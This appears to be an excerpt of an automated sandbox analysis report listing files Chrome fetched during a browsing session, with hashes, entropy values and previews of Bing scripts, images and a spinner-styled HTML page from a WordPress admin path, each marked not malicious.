                                                                                                      Preview:var wln=wln||"",Identity;(function(n){function i(n){n.style.display="none";n.setAttribute("aria-hidden","true")}function r(n){n.style.display="inline-block";n.setAttribute("aria-hidden","false")}var u,t;n&&n.sglid&&n.setLoginPreference&&sj_be&&sj_cook&&sj_evt&&_d&&typeof _d.querySelectorAll!="undefined"&&(u=function(n){var i=n.getAttribute("data-a"),t=n.getAttribute("data-p");i==="false"&&t!=null&&sj_be(n,"click",function(){sj_cook.set("SRCHUSR","POEX",t,!0,"/")})},sj_evt.bind("identityHeaderShown",function(){var n=!1;sj_be(_ge("id_l"),"click",function(){var i,t;if(!n){for(i=_d.querySelectorAll(".b_imi"),t=0;t<i.length;t++)u(i[t]);n=!0}})},!0));sj_evt&&n&&(t=function(t){var h;if(t==null||t.idp!=="orgid"||(h=n.wlProfile(),h==null||h.name==null||t.name!=null)){var e=_ge("id_n"),u=_ge("id_p"),o=_ge("id_s"),s=_ge("id_a"),f=t?t.displayName:wln,c=t?t.img:null,l=t?t.idp:null,a=t?t.cid:null;e&&s&&(a||f)?(u&&c&&(u.title=f,u.src=c,r(u)),f.length>10&&(f=f.substring(0,10).replace(/\s+$/,"")+".")
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (371), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):371
                                                                                                      Entropy (8bit):4.964799787793963
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:qGD7/TMvKyYLwRMF4owANCqwvpkTzT6n0evROARDCMwzkk6Km0Msv/Gvz:JPwKVDJHCqspkZeZJDC/wKE
                                                                                                      MD5:B743465BB18A1BE636F4CBBBBD2C8080
                                                                                                      SHA1:7327BB36105925BD51B62F0297AFD0F579A0203D
                                                                                                      SHA-256:FEE47F1645BC40FBC0F98E05E8A53C4211F8081629FFDA2F785107C1F3F05235
                                                                                                      SHA-512:5592DEF225E34995F2F4E781F02CC2B489C66A7698D2FEFF9AC9A71F09E5284B6BBDB065E1DF9C06ADFB1F467D5627FBD06E647ABF4E6AB70CF34501232126AD
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/cye7NhBZJb1Rti8Cl6_Q9XmgID0.js
                                                                                                      Preview:var SbiPrivacy;(function(){function t(){var i,r,t,u;if(typeof SbiUtil!="undefined"&&SbiUtil.rt&&_d.querySelectorAll)for(i=SbiUtil.rt.querySelectorAll(".sbiinflnk[data-link]"),r=function(t){var i=t.target;i.hasAttribute(n)&&(i.href=i.getAttribute(n),i.removeAttribute(n))},t=0;t<i.length;t++){u=i[t];SbiUtil.oncop(u,r)}}var n="data-link";t()})(SbiPrivacy||(SbiPrivacy={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (2683), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2683
                                                                                                      Entropy (8bit):5.285209446790883
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:5sksi0wg1S0h195DlYt/5ZS/wAtKciZIgDa4V8ahff/Z/92zBDZDNJC0x0M:yk1g1zbed3SBkdZ9ZGVFNJCRM
                                                                                                      MD5:FB797698EF041DD693AEE90FB9C13C7E
                                                                                                      SHA1:394194F8DD058927314D41E065961B476084F724
                                                                                                      SHA-256:795E9290718EB62A1FB00646DC738F6A6B715B1171DD54A3D2DEFA013A74F3DA
                                                                                                      SHA-512:E03C4AB727567BE95B349B971E29CFFB3890CFB1A1DDF997B34B9D69154294A00A5112F4FFCA4DF4E26BBF96AFA75E5943E965EDC8F8E21035ED2EF30B7688D8
                                                                                                      Malicious:false
                                                                                                      Preview:var IPv6Tests;(function(n){function c(t){var r,c,o,l,f,s,i,a,v;try{if(y(),t==null||t.length==0)return;if(r=sj_cook.get(n.ipv6testcookie,n.ipv6testcrumb),r!=null&&r=="1"&&!u)return;if(c=sj_cook.get(n.ipv6testcookie,n.iptypecrumb),r!=null&&c&&u&&(o=Number(r),l=(new Date).getTime(),!window.isNaN(o)&&o>l))return;if(f=_d.getElementsByTagName("head")[0],!f)return;if(s="ipV6TestScript"+t,i=sj_ce("script",s),i.type="text/javascript",i.async=!0,i.onerror=function(){Log.Log("ipv6test","IPv6Test Dom_ "+t,"IPv6TestError",!1,"Error","JSONP call resulted in error.")},a=_ge(s),a&&f)return;f.insertBefore(i,f.firstChild);i.setAttribute("src",_w.location.protocol+"//"+t+".bing.com/ipv6test/test");e&&p();v=u?(new Date).getTime()+h:"1";sj_cook.set(n.ipv6testcookie,n.ipv6testcrumb,v.toString(),!1)}catch(w){Log.Log("ipv6test","Dom_ "+t,"IPv6TestError",!1,"Error","Failed to make JSONP call. Exception - "+w.message)}}function l(t){if(!t){Log.Log("ipv6test","IPv6TestResponseError","IPv6TestError",!1,"Error","G
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):743
                                                                                                      Entropy (8bit):4.292467981720158
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:t4rnlWxNl6jK+ndr2tfVxGHryahKJ+mEMd+suVUieeaMiTpkjNLbzGMhcnVUy6o:t4DlcmjmttgHFh/f1DWTpcfsnVx
                                                                                                      MD5:0B42E2B0368746ADA110AEDF526E3052
                                                                                                      SHA1:1A2527A0C4AE0216E410BC4FEC8CAC2F825B3733
                                                                                                      SHA-256:87C3D56D605D537394F149C18D14243531461A7A0948CC0F7418B7B38EF682A0
                                                                                                      SHA-512:22D2842D7BA02B7532832628A9BF180A50C0891CFD9A929763E7C03F34204FB6DEC16D7080E58A07AB7CDFF8AAC1C14D16556E72BFC00DE9CBBA526D1B63EF26
                                                                                                      Malicious:false
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="33" height="36" viewBox="0 0 33 36" fill="#174AE4">.. <path d="M11.9219 5C10.3082 5 9 6.30817 9 7.92187V29.5781C9 31.1918 10.3082 32.5 11.9219 32.5H22.5781C24.1918 32.5 25.5 31.1918 25.5 29.5781V7.92187C25.5 6.30817 24.1918 5 22.5781 5H11.9219ZM10.7187 7.92187C10.7187 7.25741 11.2574 6.71875 11.9219 6.71875H22.5781C23.2426 6.71875 23.7812 7.25741 23.7812 7.92187V29.5781C23.7812 30.2426 23.2426 30.7812 22.5781 30.7812H11.9219C11.2574 30.7812 10.7187 30.2426 10.7187 29.5781V7.92187ZM15.3594 26.6562C14.8848 26.6562 14.5 27.041 14.5 27.5156C14.5 27.9902 14.8848 28.375 15.3594 28.375H19.1406C19.6152 28.375 20 27.9902 20 27.5156C20 27.041 19.6152 26.6562 19.1406 26.6562H15.3594Z" />..</svg>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (7083), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7083
                                                                                                      Entropy (8bit):5.288135136196839
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:oPC0FYuV4Ja/ikwCk9SoaZ8fWqVHgdKMBM/xVIU27KX3QC0UylwOCDk+h+16TN:afbh/eCLoaZBqhJQM/cxGnQC2Z+kYEqN
                                                                                                      MD5:0E84FCB6403B13A8458D66EBCF66E53B
                                                                                                      SHA1:2621AFA6DFB35A0392837505C3CDD0F5BB91E089
                                                                                                      SHA-256:02B0BD64A0FA50ED4655ADD6325858BA2BCDC33978DCD9D93F4B3C5EDDB05697
                                                                                                      SHA-512:9FBFD419ECFCE55444A4DEA65389204E2A19ECC325F31BEC3DC27683BE29AB94AEA1CF2374F0BC252D21A8856324788E146F3CD2E00983C2A312A0FADEA724E8
                                                                                                      Malicious:false
                                                                                                      Preview:var LGWidget;(function(n){function rt(n,t,r,h,c,l,v,k,d,g,nt){var rt,tt,it,ft,ut,et;(h===void 0&&(h=!0),c===void 0&&(c=!1),l===void 0&&(l=!1),v===void 0&&(v=!0),k===void 0&&(k=0),d===void 0&&(d=!0),g===void 0&&(g=!1),nt===void 0&&(nt=!1),rt=n+"Container",tt=_ge(rt),c&&(tt=sj_ce("div",rt,"b_widgetContainer"),it=sj_ce("a",n+"CtaBtn","b_widgetCtaBtn"),ft=sj_ce("div",n+"Gradient","b_widgetGrad"),it.target="_blank",it.rel="noopener noreferrer",tt.appendChild(it),tt.appendChild(ft)),tt&&t)&&(r&&tt.insertBefore(r,tt.firstChild),l&&(i||f)?(f?e.insertBefore(tt,f):e.insertBefore(tt,i),sj_be(_w,"scroll",s(ot.bind(this,n,k),100))):(t.appendChild(tt),t.style.position="relative",p(n,t),b(n),v&&!o(t)?sj_be(_w,"scroll",s(w.bind(this,t,n,h),100)):(a(tt,h),u(n))),d&&sj_evt.fire(y,n,!0),g?(ut=_ge(n+"CtaBtn"),tt.style.cursor="pointer",sj_be(ut,"click",function(n){sj_sp(n)}),sj_be(tt,"click",function(){ut.click()})):nt&&(et=_ge(n+"CtaBtn").getAttribute("href"),tt.style.cursor="pointer",sj_be(tt,"click",fun
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):242
                                                                                                      Entropy (8bit):4.86807996961474
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:A909cpDUDUBDhR9c2p83QVhXANO09c8k9Au9c2pHn:AocpwDUBhfc2W3YXANvcpiMc2Bn
                                                                                                      MD5:6C2C6DB3832D53062D303CDFF5E2BD30
                                                                                                      SHA1:B7A064A64CEAE5C9009EF7D6D8F63B90D3933C9D
                                                                                                      SHA-256:06B77EE16A2CD34ACD210B4F2B6E423762EA8874BB26AE5A37DB9DD01A00FF70
                                                                                                      SHA-512:BC2D115B53035B700D727AF9D7EFAF32DD2A39A2344F3F5FA1A82586BE849EC7803E8320661E66AB7DD2A17E64B7897E95BBD84502B91997FA46EBA4E67E8C7D
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/t6Bkpkzq5ckAnvfW2PY7kNOTPJ0.js
                                                                                                      Preview:function RewardsReportActivity(n){window.sj_rra&&sj_rra(n)}(function(){RewardsReportActivity(document.URL);sj_evt&&sj_evt.bind("acclink:updated",function(){typeof RewardsReportActivity!="undefined"&&RewardsReportActivity(document.URL)},1)})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):616
                                                                                                      Entropy (8bit):7.431744986765121
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6v/7iQ/GqTbNNfx577z3+H6vaoqaCe7Ng/O/YSe+hiRhDfCGfZWQbHEp:xYNfx977+H6vWaDJgW/Y5+hiRU4dEp
                                                                                                      MD5:63343141C64682BD3E0F711730475354
                                                                                                      SHA1:A2A7298E8F58A74292885BAE9A3F44C76C7AA945
                                                                                                      SHA-256:F90E661A7731C97E3478027D07AFD8C86E461C5F379932E15EFAD17D0E96D402
                                                                                                      SHA-512:17F7F14B0C929164283D5FD7BC829D907B923BB12A7B9D6124A6AAC64EB79AAA47163583ACCA91FC71047BB7BB707D649407801C8762D8942A44531DA9559EDF
                                                                                                      Malicious:false
                                                                                                      URL:https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....IDATXG.W.u.0.d.F`.........oF............;.v...8......$.eE1.eY.0...\.;.T@.9.. ..Hv...Z...UN.i$.|.Z...s....4"...b.^..t6..(. ..*...1..r3v.._o....\.. .0.(D...6.g....+.1.......',.?...G..o.%..D.=w.n........".F..]..~n.UM.....f..^.g.._oE'.9:.s.-...t... Q.....z..I....!.'..Q....{...50....j1.p..|..)..V..?.U..b....A.An..9$...S|W"XZ..'`.h...B../.d....{..$p..PL7....\....D..v..F..A.......S"..Q.....W...(..M(..|.6.^.........T.....2...c9.`|...(....%...RJ.==....lnU1})M..v....l.A.>..U........$....kf.`VcD.c.-.Q..x...-1.....^.?zV.r.|......IEND.B`.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1392
                                                                                                      Entropy (8bit):7.796320976198958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:zq00gh1w5R9UprEcf8jNNRwGEjJxSxcwV4/sukfm6OgRatsqDq0gcd6SUM:zqzm1wJqSLRwjjexjysukKsqDEc8m
                                                                                                      MD5:C5350436C66BC4E4C10F70BAF13DC4CA
                                                                                                      SHA1:0E77A216A7CFE0A335A1D9B5B30436CD9F9C1EC3
                                                                                                      SHA-256:A1664675270300CFAE5417D39B21CDF7005A6200BDA135CA8F978620FBBE93CD
                                                                                                      SHA-512:8798F8C560B43ECCE6E1B5406A5366E2F8DB46FDB34AADCD6A5D7566CD0F4BFA53695393874BC1381D8C57B4AE103A99362E3AB1DB29A3A05C7ABC7CBC9229F6
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG.VKl.U.}v.6........DP.."....hf...qb.Om..*.....).....HQYWP(..4........I.I`..~.uI........V.....i.y.{.w,..H..}.T.........!ra..r."b.`TX3.a-b......Gi!z..]0~.Kb9.._...W.kW..A..1a....|PX...u.Dj..\..@.,.w#.".h.D....gb....w".^..9D..6....Q\..........K.6.....1o..0;.{....$?"....ZE..Q1p..^.....(..=.G...^..4..... ..<o...h........K.5.z....4.C.!..].;..*..A.....q....F.Z..U....1r.g........8.....^F. `.[.].hUP..?.^..k...R.....'p...K.N...H...J9.LZ...k.E..j.3.!.!.>.s|@.mE...=9L.~.;S.._.m.J..\j...B...6..F....V.hC...v......'.8..aL8.g..i.Zm_kSaw...}.,..eQ."g.iY2.w.L.w....._,.11.U)..........a*..1o.j...s.k.=W...i..EY.?.#.....w.k6....e..D.Y/b..mx......Vh77...7..1.t(Z..0...Z..a/..."`....n..<.R.....(.).S..h.p.%.yN.l .p.3...p...M.i.9{H.P...9..a..3.H.{L...A.4..ZK3.W..~\.=,.//.3X...>.Z.L%:...6........9.......v..8..Y..Y..X......."..`+...U{.|.....).bX.w}#..H...v.s.....Sp...!Y...=:...7..a.YR...i...c7..
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, xresolution=86, yresolution=94, resolutionunit=2, software=GIMP 2.10.18, datetime=2020:04:16 19:04:38], progressive, precision 8, 160x160, components 3
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):3791
                                                                                                      Entropy (8bit):7.08266375441937
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:6lg111b8TUEfN/R5Cx2ftlv8Zkj81vPZsYf:0g11u5FR5CUtlkZPRKY
                                                                                                      MD5:299A479A2F7F1F30D09545CA8CC5D162
                                                                                                      SHA1:871F9E79AD73AAD0B3E0AD1B5B6B87FE837B16CE
                                                                                                      SHA-256:B314EAD01E8E89C964273418BB1117D24DFE01E4838E7A1B46FA19F64699AF05
                                                                                                      SHA-512:9D8DA9F1247D5D097E8AAAB4346AADE12E2BC74D6F9446760A5A3A45D9C2D48782D456CE05AC6FD2F0572CD26A562F2D0E4C55048FDAEC138F398A715743437D
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpg
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............V...........^...(...........1.......f...2.......t...i...............H.......H.......GIMP 2.10.18..2020:04:16 19:04:38.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ .........7.,acspMSFT...................................-lcms................................................desc... ...@cprt...`...6wtpt........chad.......,rXYZ........bXYZ........gXYZ........rTRC....... gTRC....... bTRC....... chrm...4...$dmnd...X...$dmdd...|...$mluc............enUS...$.....G.I.M.P. .b.u.i.l.t.-.i.n. .s.R.G.Bmluc............enUS.........P.u.b.l.i.c. .D.o.m.a.i.n..XYZ ...............-sf32.......B.......%.......................nXYZ ......o...8.....XYZ ......$.........XYZ ......b.........para..........ff......Y.......[chrm..............T|..L.......&g...\mluc............enUS.........G.I.M.Pmluc............enUS.........s.R.G.B...C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1833), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1833
                                                                                                      Entropy (8bit):5.03858600819449
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Jk08PkQix8QboQO7cxfFb87c9nH40VtN3HCBuNDbHNxpA:sPb6oZY80tVbHDtTA
                                                                                                      MD5:D7365C424E30CB142A85B84C0618D671
                                                                                                      SHA1:7212FE88CD0686A381ACB1B0583A544AE3ADA1B0
                                                                                                      SHA-256:8FD0225B5F75EE2326ADC68A10F5B9FC50C30A45BF4B61C7EE9364103E6102C8
                                                                                                      SHA-512:26D9A5DA2CC591954C6014B4DE1826653C9F058E9C8287342D8F0F2C9960BDAF30E1D4F8ADDF529830327D94C8BCA21848A3ADAF2846036A5E9C618992B18D5F
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/chL-iM0GhqOBrLGwWDpUSuOtobA.js
                                                                                                      Preview:var ExtendIconClickTargetV2;(function(){function n(){var u=document.querySelectorAll(".b_tpcn"),e,r,f,n,i,t;if(u)for(e=function(n){var r=u[n],i,t,f;if(r&&(r.onclick=function(n){if(!n||n.target===r){var t=r.querySelector(".tilk");t&&(_w.si_T&&_w.si_T(t.getAttribute("h")),t.click())}},i=r.nextElementSibling,i&&(r.addEventListener("mouseover",function(){r.style.cursor="pointer";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="underline")}),r.addEventListener("mouseout",function(){r.style.cursor="";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="")}),t=i,!t||t.classList&&t.classList.contains("b_title")||t.tagName==="H2"||t.tagName==="H3"||(t=t.querySelector("h2, h3")),t))){if(f=t.querySelector("a"),!f)return{value:void 0};t.addEventListener("mouseover",function(n){n&&n.target===t&&(t.style.cursor="pointer",f.style.textDecoration="underline")});t
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):374789
                                                                                                      Entropy (8bit):5.15863921127451
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:1irrzbB3LH7gaV6Z8LAfP0Rp6Izc04YFdNwRm2EjXi4SG7oIBYQmzec:aHNfi4KwYQmzec
                                                                                                      MD5:E6940BDA64389C1FA2AE8E1727ABE131
                                                                                                      SHA1:1568647E5ACD7835321D847024DF3FFDF629E547
                                                                                                      SHA-256:EEF5DD06CF622FB43EA42872BC616D956DE98A3335861AF84D35DBAF2AB32699
                                                                                                      SHA-512:91C07E84E5188336464AE9939BFC974D26B0C55D19542527BDCD3E9CAC56D8C07655DC921ACAA487ED993977A22A0F128DC3C6111273273FF1F637B20BB56FB6
                                                                                                      Malicious:false
                                                                                                      Preview:(function(n){function t(r){if(i[r])return i[r].exports;var u=i[r]={i:r,l:!1,exports:{}};return n[r].call(u.exports,u,u.exports,t),u.l=!0,u.exports}var i={};return t.m=n,t.c=i,t.d=function(n,i,r){t.o(n,i)||Object.defineProperty(n,i,{enumerable:!0,get:r})},t.r=function(n){typeof Symbol!="undefined"&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"});Object.defineProperty(n,"__esModule",{value:!0})},t.t=function(n,i){var r,u;if((i&1&&(n=t(n)),i&8)||i&4&&typeof n=="object"&&n&&n.__esModule)return n;if(r=Object.create(null),t.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:n}),i&2&&typeof n!="string")for(u in n)t.d(r,u,function(t){return n[t]}.bind(null,u));return r},t.n=function(n){var i=n&&n.__esModule?function(){return n["default"]}:function(){return n};return t.d(i,"a",i),i},t.o=function(n,t){return Object.prototype.hasOwnProperty.call(n,t)},t.p="",t(t.s=0)})([function(n,t,i){window.SpeechSDK=i(1)},function(n,t,i){"use strict";function r(n){for(
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:59:08], progressive, precision 8, 160x160, components 3
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):5944
                                                                                                      Entropy (8bit):7.819206752415454
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sUbkQe7dQVaRFmwmIE1KFxQ5JKPxCLNO8XrhNOyYSIyQ3DEmISwnFlE6NlG:s+od96rIE1KRCLHXl4DPzEmISwFlE6Nc
                                                                                                      MD5:F6E70DA298349AD94215F0B4A6875037
                                                                                                      SHA1:96F08A674EDB118B6862663ADA27CCCD56B44481
                                                                                                      SHA-256:68B6356BA9F37FF17EAE98BC094A493075F83D446B1E88F1ED32C2926E72E76C
                                                                                                      SHA-512:AFA16D89B1395F1318F42757F9451553F425539087E2EE40EC9FB14EC1FEB0C80254252951472ACC4AB8D4245E53E75F2C43FE41DAF9EC7DA8526C2F7B669BD4
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpg
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:59:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.........................................................................................h......................E..T..r..D........@..H.F&....`5.e.%...."..U@C.r.e...5.-.`4".[.`.1C.$)..pZ.".;. .(..w...x.f..*sU[....Y..<.:...b..=+.........n\.b)sv/4^`-.kN.;.v..X....Z......#_...N.....j..4.\......T..,.....B..&..L....^LcJ.KA.=....!iEY...!N....Z.:.d.i..F..d...sP.w=<..59]O..u.?..3...]i....F...C.X...[M..z..<...k..rL.UYr.jz.@ sTf..D8,5.+..<jWr..oL...<H.k;.A I.k)...'.y.j.uZ.,4......(.\HH.ByC..*1.jt.X...Z.......w......`.v.TZ.M.f.J.}.F.e..Te.-N@S...+.].\..u-9..Xg* .B.[M.$..'.ry....Zf...CV.D...S...65 `mH@#.j[.y."...r ).5.B\.o...B...Ee..Q@....,..)..u#..i.j.jAsT...[J.c_...'.....................
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (2169), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2169
                                                                                                      Entropy (8bit):5.302641155413102
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1cLdSF8cWOr7dDv8NQtaPVcbnAhaNaswAUbDdDLpmhMi7WViUCS7SDDRb:1cZSDBdDv8saMPgHfLEM8Xb3Rb
                                                                                                      MD5:61533293909D97252C70E82BD574BA68
                                                                                                      SHA1:7408DD25C19AE7BAF954074576A2F73FBB174310
                                                                                                      SHA-256:99EC639C3DDC51E7882FAB9C08EC5A905B49F4B04D1C47B6DF40F3924E81CD8E
                                                                                                      SHA-512:BF8F8879D1CABD6B8B9C6CAF9FC0A6F68362FC62328112636D78A15A4C08B35EA52E1DD8048715F2BD0E945BB0D2D8D7655E68A065942E89316E303BB536BB41
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function l(n){return parseFloat((_w.getComputedStyle?_w.getComputedStyle(n):n.currentStyle).width)}var a="results_container",t="sb_shr sw_conv",v="sb_shr sw_conva",y={"ans2 ans_n2 ans_msnO":1},i={"sb_h3 cttl":1},r="sb_ltw",p="sb_ans",n=[],u=!!_G.SPSA,f=u?{ansC:1,results:1,sa_bop:1}:{results:1},e=!1,o=20,w=-28,b=function(){if(typeof _d.querySelector!="undefined"){var n=".sb_shr{left:"+w+o+"px;width:0;float:right;margin-left:5px}.sb_ltw{margin:0 0 0 -55px;clear:both;float:left;display:block;width:50px}.pi_tc{float:right;}";sj_ic(n);sj_evt.bind("sp.enter_conv",g,1);sj_evt.bind("sp.leave_conv",h,1);sj_evt.bind("sp.submit_conv",h)}},k=function(){var u,o,i,n,s,r,t,h;if(!e){for(u=_ge(a),o=u?u.childNodes:[],i=0;i<o.length;i++)if(n=o[i],n.id&&f[n.id]||n.className&&f[n.className])for(s=n?n.childNodes:[],r=0;r<s.length;r++)for(t=s[r].firstChild;t;)h=t.nodeType,h!==3&&h!==8&&d(t),t=t.nextSibling;e=!0}},d=function(n){var i=n.className,t;if(i&&i.indexOf(p)>-1){if(u)for(t=n.firstChild.fir
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (1413), with CRLF line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2187
                                                                                                      Entropy (8bit):5.365406862483803
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:5r8sfTlCLgY7DcFCNbEhDFL2TFjBB9FkUFCTDFCfF3+YKs8888888USNGQgsgYz/:5PfJxYvcANbEBNorB9SUATDMfJQs888D
                                                                                                      MD5:487484E10C166E664FB1EC501AD40FCC
                                                                                                      SHA1:6867BBCFFA4F8C2E996C0A6E88C775B2B7017EDB
                                                                                                      SHA-256:646BFA4402458AF084B83553B4C6BFB9752B3D355D139268F9B17EB2B58F3D3B
                                                                                                      SHA-512:D085708FBC883868A9232D0F5DB386CF7C47F413940B3532EF0EE9152E0899A0FE9D77C118DF92960F6E0561D81046EB031FBE25DE9487C649E545FB63B2BFE8
                                                                                                      Malicious:false
                                                                                                      URL:https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Preview:<html>...<head>....<meta name="robots" content="noindex, nofollow">....<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">....<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">....<style>body,html{margin:30px;display:flex;justify-content:center;align-items:center;flex-direction:column}.proportion {position: relative;width: 80px;height: 80px;}.proportion div {animation: 1.2s cubic-bezier(.5, 0, .5, 1) infinite proportion;transform-origin: 40px 40px;}.proportion div:after {content: " ";display: block;position: absolute;width: 7px;height: 7px;border-radius: 50%;background: #737373;margin: -4px 0 0 -4px;}.proportion div:first-child {animation-delay: -36ms;}.proportion div:first-child:after {top: 63px;left: 63px;}.proportion div:nth-child(2) {animation-delay: -72ms;}.proportion div:nth-child(2):after {top: 68px;left: 56px;}.proportion div:nth-child(3) {animation-delay: -108ms;}.proportion div:nth-child(3):after {top: 71px;left: 48px;}.proportion
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):198
                                                                                                      Entropy (8bit):4.878337743750241
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:2LGXTMzH1MMW6REyRB8q+ApL3YekcHUMCCbn:2Q6H2UB8qR0hgCCbn
                                                                                                      MD5:E3C4A4463B9C8D7DD23E2BC4A7605F2B
                                                                                                      SHA1:D149907E36943ABB1A4F1E1889A3E70E9348707B
                                                                                                      SHA-256:CFB7FA1C682C6EEE2B763B37E002022463CD6435434A16F6335F33FB98F994A6
                                                                                                      SHA-512:3A4E38E4C631D8E845EDBC01C986F73B0368F8049BEEA7A3E8A34BDD5864C34103A48B19749C11B5BCC71FDAA672EF6C42E305E1CC6B37ABEA934766F3DEB068
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function n(){sj_evt.fire("fab_vis",t())}function t(){var n=_ge("b_header");return n?_w.pageYOffset>n.offsetHeight:!1}n();sj_be(_w,"scroll",function(){n()});fab_config.shouldTrigger=t})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (511), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):511
                                                                                                      Entropy (8bit):4.980041296618112
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:yWF4eguIWKvU9bEMsR5OErixCvJO1Vi5rgsM:LF4mKctEMYOK4CvJUVYM
                                                                                                      MD5:D6741608BA48E400A406ACA7F3464765
                                                                                                      SHA1:8961CA85AD82BB701436FFC64642833CFBAFF303
                                                                                                      SHA-256:B1DB1D8C0E5316D2C8A14E778B7220AC75ADAE5333A6D58BA7FD07F4E6EAA83C
                                                                                                      SHA-512:E85360DBBB0881792B86DCAF56789434152ED69E00A99202B880F19D551B8C78EEFF38A5836024F5D61DBC36818A39A921957F13FBF592BAAFD06ACB1AED244B
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/iWHKha2Cu3AUNv_GRkKDPPuv8wM.js
